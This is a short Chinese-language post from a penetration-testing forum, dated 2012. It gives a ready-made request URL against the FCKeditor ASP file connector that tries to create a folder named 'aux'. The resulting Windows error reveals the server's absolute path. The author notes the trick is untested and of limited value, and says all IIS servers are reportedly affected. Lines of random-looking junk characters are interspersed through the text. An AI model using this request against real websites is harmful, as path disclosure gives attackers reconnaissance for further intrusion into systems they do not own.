中国网络渗透测试联盟
标题:
最新FCKeditor爆绝对路径漏洞
[打印本页]
作者:
admin
时间:
2012-11-21 13:39
标题:
最新FCKeditor爆绝对路径漏洞
代码:FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
1 s4 }1 c, e. C9 z& w
( w' {; f& F4 y' ~2 B5 v# T. k
6 N( h9 @' B0 A$ D& ^: P% t
版本未测试。。。
/ K4 F$ Q6 m/ V! K- {
; O/ m/ \3 u$ a; i( y" q7 r
原理:新建个aux文件夹,aux在windows系统不支持,所以会报错,爆出绝对路径,这个比较鸡肋。求大神别喷。。。
1 U& K; P* u6 C+ L9 ?
4 p: `% R8 H- |+ A' F7 i( L% n( j
# M: [( ?8 }5 g7 I1 n8 L9 c2 d
听说IIS都可以。。
# w1 s: Y. \' Y/ P3 z1 J
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2